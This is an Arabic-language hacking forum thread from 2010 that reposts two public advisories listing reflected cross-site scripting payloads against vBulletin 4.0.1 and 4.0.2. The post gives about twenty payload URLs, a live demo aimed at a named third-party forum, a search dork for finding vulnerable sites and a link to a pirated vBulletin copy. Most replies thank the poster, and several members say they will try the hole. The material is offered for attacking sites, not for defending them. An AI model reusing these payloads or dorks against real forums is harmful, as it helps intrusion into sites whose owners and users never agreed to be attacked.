تغرتين في منتديات النسخة vb 4.0.x

Zero · 24 مارس 2010

بسم الله الرحمن الرحيم
الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين
السلام عليكم ورحمة الله وبركاته

اليكم التغرات

PHP:

===================================
vBulletin v 4.0.1 XSS Vulnerability
===================================

[+] Script: vBulletin Version 4.0.1
[+] Vendor: www.vbulletin.com
[+] Author: W4n73d

[~] Bug: Cross Site Scripting (XSS)
[~] Exploit: http://[HOST]/forum/calendar.php="**********alert("! XSS
!");</script>
[~] Demo: http://www.overbr.com.br/forum/calendar.php="**********alert("! XSS
!");</script>



# Inj3ct0r.com [2010-02-15]

PHP:

==========================================
vBulletin  Version 4.0.2 Xss Vulnerability
==========================================

========================================================================================                  
| # Title    : vBulletin  Version 4.0.2 Cross Site Scripting in URI Vulnerability      
| # Author   : indoushka                                                                                                 
| # Web Site : http://www.digzip.com/files/54QE0JXS/vbulletin_4.0.2nulledfinal.rar                                                     
| # Dork     : Powered by vBulletin? Version 4.0.2                                                                                                              
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       
| # Bug      : XSS                                                                     
======================      Exploit By indoushka       =================================
# Exploit  :  
 
http://127.0.0.1/upload/calendar.php?acuparam=>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/faq.php?acuparam=>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/forum.php?acuparam=>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/usercp.php/>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/subscription.php?acuparam=>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/showthread.php?acuparam=>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/showgroups.php/>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/sendmessage.php/>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/search.php/>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/register.php?acuparam=>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/profile.php?acuparam=>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/private.php?acuparam=>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/online.php/>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/newthread.php?acuparam=>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/misc.php/>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/memberlist.php?=>"'>**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/member.php/>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/inlinemod.php?acuparam=>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/index.php/>">**********alert(213771818860)</ScRiPt>

http://127.0.0.1/upload/forumdisplay.php?acuparam=>">**********alert(213771818860)</ScRiPt>



# Inj3ct0r.com [2010-02-20]

قريبا درس استغلال تغرات Xss

synyster-hacker · 24 مارس 2010

الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين موفق بإذن الله ... لك مني أجمل تحية . شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . ألف مبروك .. لقد سعدت بهذا الخبر

][آلـهـٍيـكَـل آلأزٍرٍقٌ][ · 24 مارس 2010

Zero

شكرا لك ياغالي

نزلت الثغرة في مواقع السيكيوريتي

لكن اهملتها

ان شاء الله بجربهاا

دمت بود

جــاري تجربتهـا

Cyber Code · 24 مارس 2010

مشكوور اخي , جاري التجريب في اقرب وقت انشاء الله

SoLiTair4Ever · 28 مارس 2010

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

Dr.NaNo · 28 مارس 2010

مشكور اخي على الثغره بس هذي الثعره صعبه شوي بس سهله للي محترف ..

تحياتي لك

CrAzy-HaCkEr · 29 مارس 2010

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

M!M0 · 5 أبريل 2010

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

ثغرة جيدة

abdolkadr · 11 يونيو 2010

مبدع جدا جزاك الله خير اخي الغالي

DR-HEX · 11 يونيو 2010

[align=center]شكرااااا اخي[/align]

HaKoReY · 11 يونيو 2010

[align=center]عـــأشت ألآيادي حبيبي زيرو تقبل مروري وردة وان شاء الله انشوف ابداع منك جميل [/align]

تغرتين في منتديات النسخة vb 4.0.x

بسم الله الرحمن الرحيم الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين السلام عليكم ورحمة الله وبركاته اليكم التغرات...

Zero

New Member

synyster-hacker

New Member

][آلـهـٍيـكَـل آلأزٍرٍقٌ][

<font color="blue">/</font><font color="red">[The

Cyber Code

<img src="http://vbspiders.com/vb/images/rank/prin

SoLiTair4Ever

::. Moderators .::

Dr.NaNo

New Member

CrAzy-HaCkEr

New Member

M!M0

New Member

abdolkadr

New Member

DR-HEX

New Member

HaKoReY

New Member